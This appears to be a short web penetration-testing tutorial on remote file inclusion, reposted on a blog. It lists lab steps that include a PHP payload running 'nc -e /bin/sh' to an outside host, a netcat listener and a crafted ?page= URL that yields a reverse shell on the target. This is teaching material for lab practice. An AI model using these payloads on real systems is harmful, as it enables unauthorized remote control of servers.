REMOTE FILE INCLUSION Similar to local file inclusion. But
REMOTE FILE INCLUSION
Similar to local file inclusion.
But allows an attacker to read ANY file from ANY server.
Execute PHP files from other servers on the current server.
Store PHP files on other servers as .txt.
Pre-Condition:
Set allow_url_include to On status.
Restart web service
Create a local php file on /var/www/html.
<?php passthru("nc -e /bin/sh 10.0.0.13 8080"); ?>
Execute the NC command to wait for connection.
nc -vv -l -p 8080
Visit the URL(?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.
We connect to the target machine successfully.
Ethical Hacking - Web Penetration Testing(6)
,温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/30364.html
- 上一篇:303响应状态码返回时
- 下一篇:Ajax简单用法